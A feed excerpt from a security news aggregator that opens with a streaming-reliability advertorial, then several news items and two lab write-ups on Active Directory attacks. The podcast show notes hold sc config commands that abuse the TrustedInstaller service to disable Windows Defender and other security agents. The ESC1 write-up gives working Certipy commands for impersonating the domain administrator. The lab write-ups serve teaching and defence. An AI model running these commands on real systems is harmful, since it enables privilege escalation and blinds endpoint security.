<p class="wp-block-paragraph">A streaming failure during a major match becomes public within seconds. Viewers don’t distinguish between a network issue, a processing failure, or a distribution problem; they simply see a service that failed. That single experience can shape the broadcaster’s reputation, credibility and customer loyalty, influencing whether viewers come back for the next event or recommend the service to others.</p>



<p class="wp-block-paragraph">The commercial implications are significant. Global tournaments such as the FIFA World Cup illustrate just how valuable live sports rights have become. Their return depends on reliably reaching the audience that was promised.</p>



<p class="wp-block-paragraph">Advertisers invest in live sport for one reason: to reach a large, engaged audience at the exact moment it matters most. If the stream fails during that window, the opportunity is lost. Those viewers, impressions, and advertising value cannot be recovered once the moment has passed.</p>



<p class="wp-block-paragraph">The same principle increasingly applies outside media. Customers rarely know nor care whether an outage originated in the application, the cloud environment, the network or a third-party dependency. They experience a failure of the brand. In a digital-first economy, reliability has become part of the customer experience itself.</p>



<p class="wp-block-paragraph">For broadcasters and streamers, reliability is no longer just an operational KPI. It directly influences audience trust, advertising revenue, and the long-term value of premium sports rights.</p>



<h3 class="wp-block-heading"><strong>The demands ahead are bigger</strong></h3>



<p class="wp-block-paragraph">AI-assisted production is already changing how live events are created. Broadcasters are using AI to automate highlight generation, camera selection and real-time clip packaging for social media, with new AI-assisted workflows producing sports highlights up to <a href="https://www.statsperform.com/insights/opta-pulse-launch/">80% faster</a> than traditional methods. </p>



<p class="wp-block-paragraph">All of this processing happens within the live delivery chain, where every additional task must be completed without adding latency or compromising the viewing experience.</p>



<p class="wp-block-paragraph">Personalisation at scale is the next significant challenge. Not personalisation in a vague sense, but the specific technical reality of delivering multi-language commentary tracks, different languages, different statistical overlays, and different camera angles to different viewers watching the same event simultaneously. </p>



<p class="wp-block-paragraph">Instead of one stream per event, the infrastructure has to manage a matrix of concurrent variants, each with its own encoding, storage, and delivery requirements. </p>



<p class="wp-block-paragraph">Interactive experiences add bidirectional data flows: real-time polls, integrated second-screen data, live wagering. These move data from the viewer back through infrastructure that was primarily built to push content outward. Managing that at scale is a different engineering problem from managing delivery.</p>



<p class="wp-block-paragraph">Higher-resolution formats (4K now becoming a standard expectation in premium markets, 8K moving into early deployment) are bandwidth-intensive at exactly the scale where bandwidth is already under pressure. Consumer devices are ready. Infrastructure in many high-growth markets is not uniformly there yet.</p>



<p class="wp-block-paragraph">Many of these capabilities are already being deployed for major global sporting events. The organisations investing seriously in technology, innovation, and infrastructure now are building toward a standard that will be the baseline requirement within a few years. Those that are not will be closing the gap under the worst possible conditions.</p>



<h3 class="wp-block-heading"><strong>The technology you never think about</strong></h3>



<p class="wp-block-paragraph">The broadcasters that succeed don’t leave reliability to chance. They plan for it from the outset, designing their infrastructure to handle peak demand long before the audience arrives.</p>



<p class="wp-block-paragraph">This reality hits hardest during massive global events. When a stream glitches, millions of people feel it simultaneously in a matter of seconds. Keeping those streams alive doesn’t happen by accident; it takes massive scale, intense discipline, and deep experience controlling everything from the stadium camera to the viewer’s screen.</p>



<p class="wp-block-paragraph">The lesson extends well beyond live sports. Every enterprise is becoming a real-time digital business, whether it’s delivering AI-powered applications, launching digital products, processing financial transactions, or handling a sudden surge in customer demand. Different industries may face different triggers, but the expectation is the same: the experience has to work, even when demand is at its highest.</p>



<p class="wp-block-paragraph">Delivering that level of reliability is why many of the world’s largest sports brands rely on <a href="https://www.tatacommunications.com/media-entertainment">Tata Communications</a>. Supporting the broadcast, production, and management of 80% of the world’s sporting events, and reaching more than two billion viewers across 190+ countries, Tata Communications operates in the invisible layers that make every live moment possible. We call this the “Virtual Stadium of the World”, the technology and infrastructure that connects fans, broadcasters, rights-holders, and sporting moments at a truly global scale.</p>



<p class="wp-block-paragraph">By managing the critical handoffs across contribution networks, edge processing, and global media infrastructure, we engineer the resilience required to keep 120,000 live events running flawlessly every year.</p>



<p class="wp-block-paragraph">Live sport may be the most visible test of digital infrastructure, but it won’t be the last. As AI, personalisation and real-time experiences become the norm across industries, the ability to deliver reliably at scale will define far more than match day.</p>



<p class="wp-block-paragraph">To learn more, visit us <a href="https://www.tatacommunications.com/sports?utm_source=blog&amp;utm_medium=cio&amp;utm_campaign=mes%20fifa%20campaign">here</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Merging famfs?]]></title>
<description><![CDATA[The famfs filesystem, which is meant to provide shared access to huge
memory-resident files on  CXL and other
devices, returned to
the Linux Storage,
Filesystem, Memory Management, and BPF Summit (LSFMM+BPF) in 2026.
It was first discussed at LSFMM+BPF 2024 and a new implementation was described ...]]></description>
<link>https://tsecurity.de/de/3681319/linux-tipps/merging-famfs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681319/linux-tipps/merging-famfs/</guid>
<pubDate>Mon, 20 Jul 2026 15:54:53 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The <a href="https://github.com/cxl-micron-reskit/famfs#famfs-shared-memory-filesystem-framework---user-space-repo">famfs filesystem</a>, which is meant to provide shared access to huge
memory-resident files on  <a href="https://en.wikipedia.org/wiki/Compute_Express_Link">CXL</a> and other
devices, returned to
the <a href="https://events.linuxfoundation.org/lsfmmbpf/">Linux Storage,
Filesystem, Memory Management, and BPF Summit</a> (LSFMM+BPF) in 2026.
It was <a href="https://lwn.net/Articles/983105/">first discussed at LSFMM+BPF 2024</a> and a <a href="https://lwn.net/Articles/1020170/">new implementation was described at the 2025
gathering</a>, but it still has not made its way into the kernel;  LWN <a href="https://lwn.net/Articles/1068686/">looked
at a discussion about merging famfs</a> back in April 2026.]]></content:encoded>
</item>
<item>
<title><![CDATA[Watch on Demand: Cloud & Data Security Summit]]></title>
<description><![CDATA[Attendees will be able to interact with leading solution providers and other end users facing similar challenges in securing a variety of cloud deployments. The post Watch on Demand: Cloud & Data Security Summit appeared first on SecurityWeek. This article…
Read more →
The post Watch on Demand: C...]]></description>
<link>https://tsecurity.de/de/3681034/it-security-nachrichten/watch-on-demand-cloud-data-security-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681034/it-security-nachrichten/watch-on-demand-cloud-data-security-summit/</guid>
<pubDate>Mon, 20 Jul 2026 13:39:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Attendees will be able to interact with leading solution providers and other end users facing similar challenges in securing a variety of cloud deployments. The post Watch on Demand: Cloud &amp; Data Security Summit appeared first on SecurityWeek. This article…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/watch-on-demand-cloud-data-security-summit-2/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/watch-on-demand-cloud-data-security-summit-2/">Watch on Demand: Cloud &amp; Data Security Summit</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rust Will Help Linux Succeed and Makes Coding Fun, Says Greg Kroah-Hartman]]></title>
<description><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust...]]></description>
<link>https://tsecurity.de/de/3680295/it-security-nachrichten/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680295/it-security-nachrichten/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</guid>
<pubDate>Mon, 20 Jul 2026 07:54:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust. Git is moving toward Rust. Lots of projects are starting to move toward Rust."
 

He didn't always feel that way. Kroah-Hartman added, "A number of years ago, when a friend of mine said, 'Ah, you got to try this new language. It's called Rust.' I was like, 'What? No, C is great.' His friend continued, "'No, no, no! It makes programming fun again.' I'm like, 'Nah, programming is fun in C.' He was right. I should have done it then. Rust is actually fun. It makes programming fun. It takes a lot of stuff away from having to worry about the compiler, which can fix a lot of your problems for you, and it makes code a little bit better." 

So, Kroah-Hartman has moved from being a Rust skeptic to one of its strongest champions inside the kernel. He now regards Rust as a permanent part of Linux, not an experiment. His case is straightforward: Rust's ownership and type system can eliminate most of the "stupid little tiny things" that dominate kernel Common Vulnerabilities and Exposures (CVEs), while making life easier for overworked maintainers. "Rust," in short, "makes my life so much easier...." In India, he said Linux sees "about 13 CVEs a day" and has been running at "almost nine changes an hour" for a decade or more. Most of those vulnerabilities, he argued, are not exotic attacks but simple C mistakes — unchecked pointers, forgotten unlocks, and sloppy cleanup paths: "This is what we're fixing 13 times a day. Small, trivial, little bugs like this all the time.... I've seen every CVE the kernel has done in the past 25 years. I think 80% would be gone, just because they would be caught by Rust." The remaining 20% are the logic bugs he'd prefer to focus on...." 

 Moreover, Rust is becoming the default for new work in key subsystems. "New drivers for some subsystems are only going to be accepted in Rust...." he said. Binder, the Android IPC mechanism at the heart of billions of devices, now has parallel C and Rust implementations in the kernel. The C version "will go away soon," leaving the Rust version "as the bedrock of all Android devices going forward."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Rust+Will+Help+Linux+Succeed+and+Makes+Coding+Fun%2C+Says+Greg+Kroah-Hartman%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2Frust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/07/20/0417244/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4686: Debugging Security Cameras: Firmware Updates, Python Scripts and Windows Workarounds]]></title>
<description><![CDATA[This show has been flagged as Explicit by the host.


 Show Notes


 Episode Overview




Operator kicks off the episode feeling under the weather but shares a quick tip for making perfect egg drop soup before diving into his main project: diagnosing why his front-door security camera stopped sen...]]></description>
<link>https://tsecurity.de/de/3680142/podcasts/hpr4686-debugging-security-cameras-firmware-updates-python-scripts-and-windows-workarounds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680142/podcasts/hpr4686-debugging-security-cameras-firmware-updates-python-scripts-and-windows-workarounds/</guid>
<pubDate>Mon, 20 Jul 2026 02:06:59 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Explicit by the host.</p>

<h1>
 Show Notes</h1>

<h3>
 Episode Overview</h3>

<ul>

<li>
Operator kicks off the episode feeling under the weather but shares a quick tip for making perfect egg drop soup before diving into his main project: diagnosing why his front-door security camera stopped sending alerts and recording events. What follows is a live-debugging session covering network config, script logging, Windows permission hacks, NTP time drift, and firmware flashing.</li>

</ul>

<h3>
 Key Topics &amp; Breakdown</h3>

<ul>

<li>

<ul>

<li>

<strong>
Egg Drop Soup Hack:</strong>
 How to get that perfect ribbony texture by creating a boiling swirl before pouring in the eggs, plus broth-to-egg ratio tips.</li>

<li>

<strong>
Camera Setup &amp; Network Config:</strong>
 Using static DHCP via MAC address binding on a UniFi Dream Machine (UDM) for local domain resolution instead of hardcoding IPs.</li>

<li>

<strong>
Python &amp; Cron Automation:</strong>
 Running a custom Python script every 2 minutes to check for new recordings, parsing logs with <code>
grep -v</code>
, and navigating massive log files in <code>
vi</code>
.</li>

<li>

<strong>
Windows Troubleshooting Tangent:</strong>
 Deleting the stubborn <code>
Windows.old</code>
 folder using the TrustedInstaller service hack (<code>
ExecTI.exe</code>
) instead of taking ownership manually.</li>

<li>

<strong>
Time Sync &amp; Firmware Quirks:</strong>
 Discovering the camera's system clock was stuck in 2011/2026, causing missed events. Downloading firmware via a slow third-party link, renaming <code>
.bin</code>
 to <code>
.zip</code>
, and extracting with 7-Zip.</li>

<li>

<strong>
Pre-Flash Backup Routine:</strong>
 Exporting camera configuration before upgrading, storing it in Google Drive for searchable documentation, and clearing old log/trigger files to reset the event pipeline.</li>

</ul>

</li>

</ul>

<h3>
️ Tools &amp; Techniques Mentioned</h3>

<ul>

<li>

<ul>

<li>

<code>
crontab</code>
 + Python scripts for automated monitoring</li>

<li>

<code>
grep -v</code>
, <code>
cat</code>
, <code>
tail</code>
, and <code>
vi</code>
 (line navigation with <code>
:1000</code>
)</li>

<li>
Obsidian for note-taking &amp; AI assistant integration</li>

<li>
Firefox/Playwright for headless browser testing</li>

<li>
Turbo Download Manager &amp; Bolt Media Downloader for multi-threaded/sniffing downloads</li>

<li>
7-Zip for archive extraction</li>

<li>
Google Drive for searchable config backups</li>

</ul>

</li>

</ul>

<h3>
 Resources &amp; Links</h3>

<ul>

<li>

<ul>

<li>

<strong>
Python API Script:</strong>
 <a href="https://github.com/freeload101/Python/blob/master/Uniview_API_IPC3628SR-ADF28KM-WP_get_Last.py" rel="noopener noreferrer" target="_blank">
Uniview IPC3628SR Recording Checker</a>

</li>

<li>

<strong>
Camera Model:</strong>
 <code>
IPC3628SR</code>
 (Uniview Wyze ISP Warm Light Deterrent Network Camera)</li>

<li>

<strong>
TrustedInstaller Run-as Tool:</strong>
 <a href="https://rmccurdy.com/.scripts/downloaded/ExecTI_TrustedInstaller_Runas.zip" rel="noopener noreferrer" target="_blank">
ExecTI TrustedInstaller Runner</a>

</li>

</ul>

</li>

</ul>

<h3>
 Quick Takeaways</h3>

<ol>

<li>

<ol>

<li>
 Always verify NTP/time sync on IoT cameras before troubleshooting missed events or alerts.</li>

<li>
 Use <code>
grep -v "noise"</code>
 to quickly filter out repetitive log entries when debugging automation scripts.</li>

<li>
 Windows system folders can be stubborn; running commands as <code>
TrustedInstaller</code>
 bypasses hidden file locks without manual ownership changes.</li>

<li>
 Always export and back up device configs before flashing firmware, even if the upgrade seems straightforward.</li>

<li>
 Third-party download links often use temporary tokens or <code>
.bin</code>
 wrappers; renaming to <code>
.zip</code>
 and verifying with 7-Zip can save headaches.</li>

</ol>

</li>

</ol>

<ul>

<li>

<em>
Thanks for listening! Stay curious, keep your logs clean, and remember: defense in depth starts at home.</em>
  </li>

</ul>

<p>

</p>

<p>

</p>

<p>
Example trusted installer hack</p>

<p>

</p>

<p>

</p>

<p>
# Shhhh I can't IR ... Defender, ForcePoint, SMS Agent Host ...I just can't anymore ...</p>

<p>
sc config TrustedInstaller binPath= "Reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /v Start /t reg_dword /d 4 /f"  </p>

<p>
sc start "TrustedInstaller" </p>

<p>
sc config TrustedInstaller binPath= "Reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fppsvc" /v Start /t reg_dword /d 4 /f"  </p>

<p>
sc start "TrustedInstaller" </p>

<p>
sc config TrustedInstaller binPath= "Reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CcmExec" /v Start /t reg_dword /d 4 /f"  </p>

<p>
sc start "TrustedInstaller" </p>

<p>
sc config TrustedInstaller binPath= "Reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /v Start /t reg_dword /d 4 /f"  </p>

<p>
sc config TrustedInstaller binPath= "C:\Windows\servicing\TrustedInstaller.exe"</p>

<p>

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4686/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Neue Herausforderungen bei der Bekämpfung von Geldwäsche und der Cybersicherheit ...]]></title>
<description><![CDATA[Oberstleutnant Nguyen Thanh Chung , Abteilung A05, Ministerium für Öffentliche Sicherheit, spricht auf dem Vietnam Real Asset Cryptography Summit 2026 ...]]></description>
<link>https://tsecurity.de/de/3679348/it-security-nachrichten/neue-herausforderungen-bei-der-bekaempfung-von-geldwaesche-und-der-cybersicherheit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679348/it-security-nachrichten/neue-herausforderungen-bei-der-bekaempfung-von-geldwaesche-und-der-cybersicherheit/</guid>
<pubDate>Sun, 19 Jul 2026 12:53:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Oberstleutnant Nguyen Thanh Chung , Abteilung A05, Ministerium für Öffentliche Sicherheit, spricht auf dem Vietnam Real Asset Cryptography Summit 2026 ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Cognitive biases: The bugs, features and zero‑days of the human mind (emf2026)]]></title>
<description><![CDATA[Our brains are extraordinary: fast, intuitive and endlessly creative, but they also come with quirks, shortcuts and predictable bugs. These “cognitive biases” shape everything from the food we order to the technologies we build, often without us noticing. In this talk, we’ll explore some of the m...]]></description>
<link>https://tsecurity.de/de/3679323/it-security-video/cognitive-biases-the-bugs-features-and-zerodays-of-the-human-mind-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679323/it-security-video/cognitive-biases-the-bugs-features-and-zerodays-of-the-human-mind-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 12:32:55 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Our brains are extraordinary: fast, intuitive and endlessly creative, but they also come with quirks, shortcuts and predictable bugs. These “cognitive biases” shape everything from the food we order to the technologies we build, often without us noticing. In this talk, we’ll explore some of the most surprising and entertaining biases that influence our everyday decisions and what they reveal about how humans actually think.

This isn’t a list of flaws. It’s a tour of the elegant, messy, deeply human heuristics that help us navigate a complex world. By understanding these patterns, we can design better tools, make smarter decisions and be kinder to ourselves and others when things don’t go to plan.

Expect demos, relatable examples and practical takeaways you can use the moment you leave the tent.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/97-cognitive-biases-the-bugs-features]]></content:encoded>
</item>
<item>
<title><![CDATA[Cognitive biases: The bugs, features and zero‑days of the human mind (emf2026)]]></title>
<description><![CDATA[Our brains are extraordinary: fast, intuitive and endlessly creative, but they also come with quirks, shortcuts and predictable bugs. These “cognitive biases” shape everything from the food we order to the technologies we build, often without us noticing. In this talk, we’ll explore some of the m...]]></description>
<link>https://tsecurity.de/de/3679313/it-security-video/cognitive-biases-the-bugs-features-and-zerodays-of-the-human-mind-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679313/it-security-video/cognitive-biases-the-bugs-features-and-zerodays-of-the-human-mind-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 12:18:47 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Our brains are extraordinary: fast, intuitive and endlessly creative, but they also come with quirks, shortcuts and predictable bugs. These “cognitive biases” shape everything from the food we order to the technologies we build, often without us noticing. In this talk, we’ll explore some of the most surprising and entertaining biases that influence our everyday decisions and what they reveal about how humans actually think.

This isn’t a list of flaws. It’s a tour of the elegant, messy, deeply human heuristics that help us navigate a complex world. By understanding these patterns, we can design better tools, make smarter decisions and be kinder to ourselves and others when things don’t go to plan.

Expect demos, relatable examples and practical takeaways you can use the moment you leave the tent.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/97-cognitive-biases-the-bugs-features]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Escalated to Domain Admin Using AD CS (And How to Fix It)]]></title>
<description><![CDATA[What is AD CS?Active Directory Certificate Services (AD CS) allows users and computers to obtain certificates for authentication, encryption, and other services.If certificate templates are misconfigured, attackers can request certificates for other users, including Domain Administrators, leading...]]></description>
<link>https://tsecurity.de/de/3677784/hacking/how-i-escalated-to-domain-admin-using-ad-cs-and-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677784/hacking/how-i-escalated-to-domain-admin-using-ad-cs-and-how-to-fix-it/</guid>
<pubDate>Sat, 18 Jul 2026 11:39:17 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IwcmPEl9c14DK-2hWY1W1g.png"></figure><h3>What is AD CS?</h3><p><strong>Active Directory Certificate Services (AD CS)</strong> allows users and computers to obtain certificates for authentication, encryption, and other services.</p><p>If certificate templates are misconfigured, attackers can request certificates for <strong>other users</strong>, including <strong>Domain Administrators</strong>, leading to privilege escalation.</p><p>In this lab, I exploited an <strong>ESC1</strong> certificate template misconfiguration.</p><h3>Lab Setup</h3><ul><li><strong>Domain:</strong> LAB.LOCAL</li><li><strong>Domain Controller:</strong> 192.168.56.104</li><li><strong>Certificate Authority:</strong> lab-DC1-CA</li><li><strong>Attacker:</strong> bob</li></ul><h3>Step 1 — Enumerate AD CS</h3><p>First, I looked for vulnerable certificate templates using <strong>Certipy</strong>.</p><pre>certipy-ad find -u bob@lab.local -p 'password@123' -dc-ip 192.168.56.104 -dc-host DC1.lab.local -target DC1.lab.local -ldap-scheme ldap -vulnerable -debug</pre><p>Certipy identified a vulnerable template named:</p><pre>ESC1-Lab</pre><p>This template allowed the requester to specify an arbitrary <strong>User Principal Name (UPN)</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MMCsemUil50u2bqrh-1jHA.png"></figure><h3>Step 2 — Request an Administrator Certificate</h3><p>Since the template was vulnerable, I requested a certificate while impersonating the <strong>Administrator</strong> account.</p><pre>certipy-ad req -u bob@lab.local -p 'Password@123' -ca lab-DC1-CA -template ESC1-Lab -upn Administrator@lab.local -dc-ip 192.168.56.104</pre><p>Certipy successfully issued an <strong>Administrator certificate</strong> and saved it as:</p><pre>administrator.pfx</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-_feIP7X-uB2A68CtwlfQA.png"></figure><h3>Step 3 — Authenticate as Administrator</h3><p>Finally, I authenticated using the issued certificate.</p><pre>certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.56.104</pre><p>Authentication succeeded, allowing me to impersonate the <strong>Domain Administrator</strong> without ever knowing the Administrator’s password.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vh8aenq802cDnuJT2GG2rQ.png"></figure><h3>Why Did This Work?</h3><p>The certificate template was vulnerable to <strong>ESC1</strong> because it:</p><ul><li>Allowed users to enroll.</li><li>Allowed the requester to supply any UPN.</li><li>Was trusted for client authentication.</li></ul><p>This meant Bob could request a certificate for <strong>Administrator@lab.local</strong> and authenticate as that user.</p><h3>How to Fix It</h3><p>To prevent ESC1 attacks:</p><p>1.Disable <strong>“Supply in the request”</strong> unless absolutely necessary.</p><p>2. Restrict enrollment permissions to trusted users.</p><p>3. Review certificate templates regularly.</p><p>4. Remove unnecessary Client Authentication EKUs.</p><p>5. Audit AD CS with tools like <strong>Certipy</strong> and <strong>BloodHound</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1022/1*nXg7Fgi0SkhyFf5sYadGyg.png"></figure><h3>Verify the Fix</h3><p>Run the enumeration again.</p><pre>certipy-ad find -u bob@lab.local -p 'password@123' -dc-ip 192.168.56.104 -vulnerable</pre><p>If the template is properly secured, <strong>ESC1-Lab</strong> should no longer appear as vulnerable.</p><h3>Key Takeaways</h3><p>1. Regularly audit AD CS templates.</p><p>2. Follow the principle of least privilege.</p><p>3. Restrict certificate enrollment permissions.</p><p>4. Monitor certificate enrollment events.</p><blockquote><strong><em>Disclaimer:</em></strong><em> This article is part of my Active Directory Lab Series. All demonstrations were performed in my self-hosted GOAD lab for educational and defensive purposes. Never perform these techniques on systems without proper authorization.</em></blockquote><p><em>— Written by</em></p><p><strong>Aruvasaga Chithan A</strong></p><p><strong>Ethical Hacker &amp; Cyber Security Researcher.</strong></p><p><strong>Thanks for reading — your support keeps me writing.</strong><br><strong>See you in the next article…</strong></p><p><a href="http://www.linkedin.com/in/aruvasaga-chithan"><em>Linkedin</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=a86cc69aed5a" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-escalated-to-domain-admin-using-ad-cs-and-how-to-fix-it-a86cc69aed5a">How I Escalated to Domain Admin Using AD CS (And How to Fix It)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Abused a Group Policy Object (GPO) in Active Directory (And How to Fix It)]]></title>
<description><![CDATA[Group Policy Objects (GPOs) are one of the most powerful features in Active Directory. They allow administrators to manage settings across computers and users.But if the wrong user has control over a GPO, it can become an easy privilege escalation path.In this lab, I’ll use BloodHound to identify...]]></description>
<link>https://tsecurity.de/de/3677783/hacking/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677783/hacking/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it/</guid>
<pubDate>Sat, 18 Jul 2026 11:39:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IYSV94Q4TKE53NHop9sBDw.png"></figure><p>Group Policy Objects (GPOs) are one of the most powerful features in Active Directory. They allow administrators to manage settings across computers and users.</p><p>But if the wrong user has control over a GPO, it can become an easy privilege escalation path.</p><p>In this lab, I’ll use <strong>BloodHound</strong> to identify a dangerous GPO permission and then show how to fix it.</p><h3>Lab Setup</h3><ul><li><strong>Domain:</strong> LAB.LOCAL</li><li><strong>Domain Controller:</strong> 192.168.56.104</li><li><strong>Attacker:</strong> Kali Linux</li><li><strong>User:</strong> bob</li></ul><h3>Step 1 — Collect Active Directory Data</h3><p>First, I collected information from Active Directory using <strong>BloodHound.py</strong>.</p><pre>bloodhound-python -u bob -p 'password@123' -d lab.local -ns 192.168.56.104 -c All --zip</pre><p>BloodHound successfully collected:</p><ul><li>8 Users</li><li>55 Groups</li><li>3 GPOs</li><li>2 OUs</li><li>1 Computer</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jA0bN8_u-FCRSuDjOdIbFg.png"></figure><h3>Step 2 — Import into BloodHound</h3><p>Next, I uploaded the generated ZIP file into BloodHound Community Edition.</p><p>BloodHound maps relationships between users, groups, computers, OUs, and GPOs, making it much easier to spot privilege escalation paths.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*T0gcQnP34CNfRQp0qFv4hw.png"></figure><h3>Step 3 — Finding the Misconfiguration</h3><p>BloodHound showed that <strong>Bob</strong> had <strong>WriteDacl</strong>, <strong>WriteOwner</strong>, and <strong>GenericWrite</strong> permissions over the <strong>Employees Policy</strong> GPO.</p><p>These permissions are dangerous because they allow a user to modify who controls the GPO or change its configuration.</p><h3>Why Is This Dangerous?</h3><p>If an attacker can edit a GPO linked to an Organizational Unit (OU), they may be able to:</p><ul><li>Execute scripts on domain computers</li><li>Deploy scheduled tasks</li><li>Add users to local Administrators</li><li>Push malicious registry changes</li><li>Gain higher privileges across the domain</li></ul><p>A single misconfigured GPO can impact many systems at once.</p><h3>Step 4 — Fixing the Issue</h3><p>On the Domain Controller:</p><pre>Group Policy Management<br>        ↓<br>Employees Policy<br>        ↓<br>Delegation</pre><p>Review who has permissions on the GPO.</p><p>Remove unnecessary permissions such as:</p><ul><li>GenericWrite</li><li>misconfiguredWriteDacl</li><li>WriteOwner</li></ul><p>Only trusted administrators should have these rights.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1021/1*FC8s8UA4FIWW0lay8j9Ikw.png"></figure><h3>Verify the Fix</h3><p>Run BloodHound again after updating the permissions.</p><pre>bloodhound-python -u bob -p 'password@123' -d lab.local -ns 192.168.56.104 -c All --zip</pre><p>Re-import the ZIP into BloodHound.</p><p>The dangerous permission edges should no longer appear for <strong>Bob</strong>.</p><h3>Key Takeaways</h3><p>1.Regularly audit GPO permissions.</p><p>2. Use the principle of least privilege.</p><p>3. Review BloodHound findings periodically.</p><p>4. Remove unnecessary <strong>GenericWrite</strong>, <strong>WriteDacl</strong>, and <strong>WriteOwner</strong> permissions.</p><blockquote><strong><em>Disclaimer:</em></strong><em> </em>The techniques demonstrated in this article were performed in a private Active Directory lab for learning purposes. Always obtain proper authorization before testing any production environment.</blockquote><p><em>— Written by</em></p><p><strong>Aruvasaga Chithan A</strong></p><p><strong>Ethical Hacker &amp; Cyber Security Researcher.</strong></p><p><strong>Thanks for reading — your support keeps me writing.</strong><br><strong>See you in the next article…</strong></p><p><a href="http://www.linkedin.com/in/aruvasaga-chithan"><em>Linkedin</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5d59c031e602" width="1" height="1" alt=""><hr><p><a 